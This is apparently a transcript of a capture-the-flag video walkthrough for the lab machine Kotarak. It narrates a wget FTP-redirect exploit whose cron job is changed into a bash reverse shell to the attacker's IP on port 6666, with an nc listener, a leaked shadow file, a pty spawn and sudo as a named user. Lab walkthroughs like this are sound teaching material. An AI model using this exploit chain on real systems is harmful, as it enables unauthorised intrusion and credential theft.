redirects to the victim's request. So this is wget-exploit.py. Let's copy this. So I need to run this on the target, I think. Oh man. Right, okay. So we are going to do nano exploit.py just because it's easier. And put that in there. Let's go through this code and figure out what needs to be done. This box is really hard, by the way, guys. Really, really, really difficult. Right, so this sends wget-rc. Oh, that's fine. It does it for me. That's okay. It gets it from my FTP server, I think. Yeah. FTP redirect vulnerability. Perfect. That's good. and then it's going to extract the file and install a cron job. I don't really want to do that, but that's okay. Right, I think what I need to do is change the listening IP. Do you know what? I've not made notes in ages. Okay, we follow the steps here. Hang on. Let's not save it. I was just trying to find... Oh, yeah, yeah. I'm actually going to take all that. Then, ... then edit the code. Edit the Python code with the following IPs and payload. From what I saw, anyway. Why is it doing that? Oh, I didn't save it. Oh. I'm an idiot. Right. The amount of times I say I'm an idiot. Should realize it's true by now. I was thinking that needs to be Python 3, but I'm not running it on my system. I'm running it on the target, so we should be okay. So handlers serve forever. Is that the final line? Oh, do I need that? What's happening? Right, forget it. No. Go again. Right, we're going to go from here. Get the shebang. We're going to go all the way down to end of file, right? There we go. That's it. That's it all. So let's take a look now at this. The listen IP I want to be local, so I can do 127.0.0.1, or I can do it on any interface, right? And the port is 80. That's right. We know it's running on 80 because we used I can't remember what it's called. Auth thingy. What was it? What's it called? I can't remember what it's called. We literally just used it. There we go, authbind. There we go, authbind. So port 80 is right. The FTP host, I've got this running on port 21, so 10.10.14.9 on port 21. This is the cron job which it's doing here. Let's edit that to a reverse shell. That could be nice. That could be nice. Let's do that. Reverse shell, we'll just pick the basic one here. We will do this here. So bash do I need this in quotes or do I not? Probably not. I do need my IP though, 10.10.14.9, and the port, I don't know, 6666 because we can. Ready, is your FTP server running? FTP down, open, serving Wget exploit. Okay. File was served, check that in a minute. I'm going to change the message as well. File served, check for a shell. Not that this matters. In 2 minutes, because it needs to run it. Oh, no, what have I done? Yeah, whatever. Forget it. That's fine. Oh. Bit of this. So annoyed with this box. Smile, guys. It's not the end of the world. I'm still going to do it. Get that shell back. I hate that. Sometimes it's Control C to copy, and then sometimes it's Control Shift C to copy if you're in a terminal, and then it's like Control V to paste. Oh no, it isn't. It's Control Shift V. It's like, just be consistent, guys. Be consistent. I don't even need to edit this message, but I will. Right, in a minute is fine. I know it means 2. And shell is spelled wrong. That's fine. I don't care. Right, so what I've changed, the important bit that I've changed, is this. I think everything else can be as is. Probably. I don't know how this is going to work, to be honest with you. I don't know how this is going to work. I've got my FTP server running. I'm not sure if I should go into temp or somewhere else, but we're going to wget 10.10.14.9 exploit.py. Right. Okay. So on the target, we have this. Now, before I do anything else, before I decided I'm the biggest idiot ever, before I do anything else, right here, we are doing NC LVP 6666. We are listening for that shell coming back. Ready for this. Python exploit.py. Permission denied. The reason permission is denied is it won't let me bind on port 80, right? So, auth bind. Python exploit.py. We're waiting, guys. We need to wait 4 minutes. We need to wait 2 minutes for the first call for that file, to the call to the FTP to get that file, the .w whatever it was file. We need to wait another 2 minutes for the shell to come back, which is here. So if I can find this FTP session opened, looks good. Okay, FTP found. Serving wget exploit on port 80. Maybe we need to wait 2 minutes then. Maybe not. I don't know. This is the first time I've done this. Yeah, I'll have to wait another like 4 minutes or so. So we need to wait for it to hopefully grab and redirect. Hopefully. Well, I mean, yeah. It's found. Right, that connection to the FTP was just for it checking that it was running. It's serving the exploit on port 80, right? The cron job is going to connect using wget to port 80. It will redirect to this and grab the whatever that file is, .w something, wgetrc file, right? It'll connect to that and grab that and store it, and then Message file not found. That can't be right. It was meant to grab from here. So it's done a 404 code, not a 302 code. So the redirect isn't working properly. This is the right idea. I don't quite understand right now how it's working or why it's not working. I'm going to have to go through the code, I think, and edit a few more things. I'm going to give it one more minute to see if it connects again, but it should have done something by now. It should have done the redirect and it didn't. Then I'm going to start the video, just have a look through the code and study it a bit, and then come back and let you know what I found. Because right now, I'm a little bit muddled. Right, it's sending back 404, that's not good. Right, I'll be back soon. I'm going to study this code and figure it out. This box is stupid. I've reverted the system. I had to go through quite a few of the steps again in order to get a shell. I've not yet gone back to the interpreter shell. Just taking a look at this. I don't know what went wrong. I've had a look through it and I've been studying it. And really, it should, when it receives something, it should automatically do the redirect. But I don't understand that. I've been thinking about this as well, actually, to be fair. This, I think we can do like bash command and then put this in quotes, because I'm not sure whether that's going to work straight off, you see. So we'll try that. I mean, noise, seriously. Well, Wget 10.10.14.9/exploit.py again. Again, we're not yet using interpreter. We're just going to try this straight off, but we should have our 6666 still going somewhere. There it is. I think I might kill it and go again for no reason other than the fact that I can, just to make sure it's fresh. The FTP server is still running here. You can see the last one disconnected. I mean, I don't know what to do. I'm not sure if we just like do auth bind again and then, you know, exploit.py. I mean, oh, that's good. Yeah, it's literally right there. Auth bind python exploit.py. I mean, we're going again, but I've not changed anything except for that command, really. That's opened. It's just when it starts getting 404s, I'm like, well, what do I do about that? You think the code would, the exploit code would handle that. I don't know why it didn't. Unless it's the fact that I put the HTTP server as 0000. That's an interesting point. I could change that. Although that shouldn't affect the... I don't know, man. I'm fried on this one. I've got a feeling it's just going to 404 again as soon as that hits 404. As soon as that hits 4, it's going to 404. I've not changed anything. Didn't mean to do that. Okay, it's done the redirect this time. I've not changed anything. It's uploading. Okay. Okay, it's uploaded it. Huh. It's completed as well. Unless it's just my shell command with the bash C, which I missed. I've not changed anything else. It was literally just that. As it's going to take 2 minutes to run, let's update this. Yeah, this. So what I actually did was bash C. There we go. I'm excited. In 1 minute time, it may give me a shell, or it may give me a message saying expect a shell or expect a whatever in 2 minutes, or I don't know. So it could be 1 minute away, or it could be 3 minutes away, or it might just fail outright because there's still a lot that can go wrong here. There's still a lot that can go wrong here. This box is good. It's only dumb when I can't do it. It's like fantastic when I can. No, it is a very, very good exploit, this one. Whoever found this, like, props to them. Absolute genius. Ah, there we go. So it's a sending back a cron job script, which is not what I, oh, there's the shadow file. We've got the Ubuntu hash. We might be able to crack that. Sending back a cron job script, but we're not. I've modified that. Check for shell in a minute. Yeah. So technically 2 minutes. It's going to be at 4:04, which is, how ironic is this? How ironic is this? That it's at 4:04 after all that. When it gets to 4:04, we should. I don't like that typo. We wait and come on, please, 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 please. We pray. We've got less than a minute, guys. Are we excited, or is it just me? Oh, we're in. Yeah, fantastic. So it was a minute. Nice. But as much as we're roots, it does have the root flag. It does have the root flag. That one was good. That one was fabulous. I nearly said fantabulous. Fantastic, fabulous. I'm mixing fantabulous, which isn't even a word, fabulous and fantastic together. We're done. Let's get this finished. Let's get this one finished. I'm really happy about that. Submit the user flag. System blood taken in 22 hours. Yeah, I can see why. I mean, I did it quicker than 22 hours, but, you know, back then, this sort of thing wasn't known about. I've sort of had some inkling about this before. I'm putting the root flag in first, just in case everything goes pear-shaped. At least it'll be easy to get the other one. Submit flag difficulty. Flag difficulty. Piece of cake, should we say? Shall we say piece of cake? I'm going to go with hard. I'm going to go with hard. I think the first one, however, wasn't too bad. I just need to find it. Where were we? Where were we? Do I even have the... Because that's that flag. It was when I became... I can't find it. It's when I became this user. Did I not get the flag? Oh, man. Oh, man. Yeah. Yeah, I am pretty much the wrong user now, aren't I? And so I can't do anything about that. Let's just kill that off. What else have we got? Have I got anything which is still connected to the server? Guys, I didn't do the thing. I didn't do the thing. I didn't do the... It's easy enough. It's easy enough. We'll sort it. It's easy enough. We'll run that code. Get access like this. We're going to do this one more time because it's annoying. Python C import pty spawn bin bash. We are going to sudo as Atanas, and the password is F16 Tomcat because I know this off by heart by now. Now that we are this user, we're going home Atanas, and we are catting user.text. Thank you so much. Whatever, it's easy from there. Of course, we forgot earlier. I could just put it earlier on in the thing, but I just think it's funny. Don't forget your flags, guys. It's important. I might give that one an extra point on difficulties just because I had to redo it. But you saw how easy it was, really. No, it's giving me a chance. Medium. There we go. Because we had some SSRF, we had to, you know, we had to do the whole war thing, and yeah, not too. Wow. Player 2456, lovely to have solved Kotarak. Massively approved of this one, very good. Very good. I'm just going to get that for my thumbnail thing. Thank you guys, thank you for joining, thank you for sticking with me. That was a bit of a rough ride. And I got a little bit annoyed in the middle there, but we got there in the end. Please leave a like, subscribe if you haven't already, because it just keeps me going. I've done 2 boxes every week since last April, and it's now 27th of January. I'm going to need a break at some point, but not yet. So come on, keep these likes and subscriptions coming, because it makes me feel like it's all worth it in the end. Please visit Nethemba.com. All your pen testing needs. Thank you guys. Goodbye. What a box.